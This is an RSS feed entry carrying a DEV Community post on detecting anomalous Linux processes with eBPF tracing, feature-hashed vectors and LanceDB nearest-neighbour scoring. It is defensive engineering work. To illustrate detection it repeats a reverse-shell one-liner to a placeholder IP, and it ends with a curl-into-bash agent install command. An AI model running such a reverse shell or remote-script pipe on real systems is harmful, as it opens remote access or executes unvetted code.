<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Gretl</title>
    <description>The latest articles on DEV Community by Gretl (@gretl).</description>
    <link>https://dev.to/gretl</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3948466%2Ff08c3d55-4040-4f80-b59f-1d7ec15816c5.png</url>
      <title>DEV Community: Gretl</title>
      <link>https://dev.to/gretl</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/gretl"/>
    <language>en</language>
    <item>
      <title>Detecting unusual processes on your servers without writing a single rule</title>
      <dc:creator>Gretl</dc:creator>
      <pubDate>Sun, 24 May 2026 03:27:41 +0000</pubDate>
      <link>https://dev.to/gretl/detecting-unusual-processes-on-your-servers-without-writing-a-single-rule-2he</link>
      <guid>https://dev.to/gretl/detecting-unusual-processes-on-your-servers-without-writing-a-single-rule-2he</guid>
      <description>&lt;p&gt;Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment.&lt;/p&gt;

&lt;p&gt;The problem isn't that rules are bad — it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through.&lt;/p&gt;

&lt;p&gt;We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates — without any configuration.&lt;/p&gt;

&lt;p&gt;Here's how we built it using eBPF and LanceDB.&lt;/p&gt;

&lt;p&gt;Step 1: Capture everything at the kernel level with eBPF&lt;br&gt;
eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires every time any process is executed on the machine — before the process even starts running.&lt;/p&gt;

&lt;p&gt;For each execution we capture:&lt;/p&gt;

&lt;p&gt;The process name (comm) and full command line (argv)&lt;br&gt;
The parent process name&lt;br&gt;
The UID of the calling process&lt;br&gt;
Any active network connections (src/dst IP, port)&lt;br&gt;
This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime:&lt;/p&gt;

&lt;h1&gt;
  
  
  [tracepoint]
&lt;/h1&gt;

&lt;p&gt;pub fn gretl_execve(ctx: TracePointContext) -&amp;gt; u32 {&lt;br&gt;
    let filename_ptr = unsafe { ctx.read_at::(16)? } as *const u8;&lt;br&gt;
    let pidtgid = bpf_get_current_pid_tgid();&lt;br&gt;
    let pid = (pidtgid &amp;gt;&amp;gt; 32) as u32;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;let mut event = ExecveEvent {
    pid,
    comm:     [0u8; 16],
    filename: [0u8; 64],
    argv1:    [0u8; 64],
    // ...
};

if let Ok(comm) = bpf_get_current_comm() {
    event.comm = comm;
}

emit_execve(&amp;amp;event)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;}&lt;br&gt;
The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required — no agents inside your containers, no sidecars, no changes to your application code.&lt;/p&gt;

&lt;p&gt;For servers without eBPF support, the Node.js agent falls back to reading /proc//cmdline and /proc//status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry.&lt;/p&gt;

&lt;p&gt;Step 2: Represent each process execution as a vector&lt;br&gt;
The raw event — a process name, a cmdline string, a parent process, a port — isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector.&lt;/p&gt;

&lt;p&gt;We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector.&lt;/p&gt;

&lt;p&gt;function featureVector(event: ProcessEvent): number[] {&lt;br&gt;
  const vec = new Float32Array(128);&lt;/p&gt;

&lt;p&gt;const tokens = [&lt;br&gt;
    event.process_name,&lt;br&gt;
    event.parent_process,&lt;br&gt;
    event.event_type,&lt;br&gt;
    String(event.local_port),&lt;br&gt;
    String(event.remote_port),&lt;br&gt;
    ...tokenise(event.cmdline),   // split cmdline into meaningful tokens&lt;br&gt;
  ];&lt;/p&gt;

&lt;p&gt;for (let i = 0; i &amp;lt; tokens.length; i++) {&lt;br&gt;
    const t = tokens[i].toLowerCase().trim();&lt;br&gt;
    if (!t) continue;&lt;br&gt;
    const idx  = hashStr(t, i * 31) % 128;&lt;br&gt;
    const sign = (hashStr(t, i * 31 + 1) &amp;amp; 1) ? 1 : -1;&lt;br&gt;
    vec[idx]  += sign;&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;// L2 normalise so cosine distance is well-defined&lt;br&gt;
  let norm = 0;&lt;br&gt;
  for (let i = 0; i &amp;lt; 128; i++) norm += vec[i] * vec[i];&lt;br&gt;
  norm = Math.sqrt(norm) || 1;&lt;br&gt;
  return Array.from(vec).map(v =&amp;gt; v / norm);&lt;br&gt;
}&lt;br&gt;
Feature hashing is deterministic, requires no external model, adds no latency, and works well for this kind of structured-text input. A bash -i &amp;gt;&amp;amp; /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space.&lt;/p&gt;

&lt;p&gt;Why not use a neural embedding model?&lt;br&gt;
We looked at this seriously. Models like all-MiniLM-L6-v2 (22 MB, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity — they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths.&lt;/p&gt;

&lt;p&gt;The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 events per hour, each needing an embedding call before it can be scored and stored. The options were:&lt;/p&gt;

&lt;p&gt;Local model on the backend — works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.&lt;br&gt;
External API (e.g. OpenAI) — adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.&lt;br&gt;
Feature hashing — runs in &amp;lt;0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.&lt;br&gt;
For this specific input — structured fields like process names, parent pids, cmdline tokens — feature hashing performs surprisingly well. bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/4444 0&amp;gt;&amp;amp;1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring.&lt;/p&gt;

&lt;p&gt;The embedding layer is intentionally isolated behind a single featureVector() function. Swapping it for a neural model later is a one-function change — the scoring logic, the LanceDB tables, and the API surface don't care what's inside it.&lt;/p&gt;

&lt;p&gt;Step 3: Store and query with LanceDB&lt;br&gt;
LanceDB is an embedded vector database — it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required.&lt;/p&gt;

&lt;p&gt;We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive and old entries are pruned after 7 days.&lt;/p&gt;

&lt;p&gt;export async function scoreAndLearn(&lt;br&gt;
  org_id: string,&lt;br&gt;
  workload: string,&lt;br&gt;
  event: ProcessEvent,&lt;br&gt;
): Promise {&lt;br&gt;
  const conn  = await db();&lt;br&gt;
  const table = await getOrCreateTable(conn, tableName(org_id, workload));&lt;br&gt;
  const vec   = featureVector(event);&lt;/p&gt;

&lt;p&gt;// Find k=10 nearest neighbours in this workload's history&lt;br&gt;
  const results = await table.vectorSearch(vec).limit(10).toArray();&lt;/p&gt;

&lt;p&gt;let score = 1.0; // default: completely unseen&lt;br&gt;
  if (results.length &amp;gt; 0) {&lt;br&gt;
    const distances = results.map(r =&amp;gt;&lt;br&gt;
      cosineDistance(vec, Array.from(r.vector))&lt;br&gt;
    );&lt;br&gt;
    const minDist = Math.min(...distances);&lt;br&gt;
    score = Math.min(1, minDist * 2); // scale to 0–1&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;// Add this event to the baseline for future comparisons&lt;br&gt;
  table.add([{ vector: vec, ts: Date.now() }]);&lt;/p&gt;

&lt;p&gt;return score;&lt;br&gt;
}&lt;br&gt;
The anomaly score is 0 for something we've seen many times before, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it.&lt;/p&gt;

&lt;p&gt;Step 4: Natural language search&lt;br&gt;
Once every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables.&lt;/p&gt;

&lt;p&gt;// In the dashboard Security tab:&lt;br&gt;
// "show me anything that looks like a reverse shell"&lt;/p&gt;

&lt;p&gt;POST /telemetry/security/search&lt;br&gt;
{ "query": "reverse shell bash outbound connection" }&lt;br&gt;
This returns the events whose vectors are closest to the query vector — semantically similar behaviour, not keyword matches. A process running bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/4444 0&amp;gt;&amp;amp;1 will score highly even if it doesn't contain the literal words "reverse shell".&lt;/p&gt;

&lt;p&gt;What it looks like in practice&lt;br&gt;
After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts. Then:&lt;/p&gt;

&lt;p&gt;A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn&lt;br&gt;
Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run&lt;br&gt;
Someone runs curl | bash as root → score 0.94, flagged immediately&lt;br&gt;
Your usual nginx worker restarts → score 0.02, ignored&lt;br&gt;
No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own.&lt;/p&gt;

&lt;p&gt;The architecture in one diagram&lt;br&gt;
Server                    Backend                   Storage&lt;br&gt;
──────                    ───────                   ───────&lt;/p&gt;

&lt;p&gt;eBPF (kernel) ──execve──▶ /otlp/v1/events&lt;br&gt;
                               │&lt;br&gt;
/proc fallback ──────────▶     │&lt;br&gt;
                               ▼&lt;br&gt;
                        featureVector()&lt;br&gt;
                               │&lt;br&gt;
                               ▼&lt;br&gt;
                        LanceDB (per workload) ──▶ anomaly_score&lt;br&gt;
                               │&lt;br&gt;
                               ▼&lt;br&gt;
                        ClickHouse.security_events&lt;br&gt;
                               │&lt;br&gt;
                               ▼&lt;br&gt;
                        Dashboard + NL search&lt;br&gt;
What's next&lt;br&gt;
The current embedding is purely structural — it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms.&lt;/p&gt;

&lt;p&gt;We're also working on per-workload alert thresholds — so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85.&lt;/p&gt;

&lt;p&gt;Try it on your servers&lt;br&gt;
The agent installs in one command and starts building a baseline immediately. Works on any Linux server — EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else.&lt;/p&gt;

&lt;p&gt;GR_TOKEN=your-token bash &amp;lt;(curl -fsSL &lt;a href="https://gretl.dev/install-agent.sh" rel="noopener noreferrer"&gt;https://gretl.dev/install-agent.sh&lt;/a&gt;)&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F85gyx4xg0tfdug1uu7d7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F85gyx4xg0tfdug1uu7d7.png" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>machinelearning</category>
      <category>monitoring</category>
      <category>security</category>
    </item>
  </channel>
</rss>
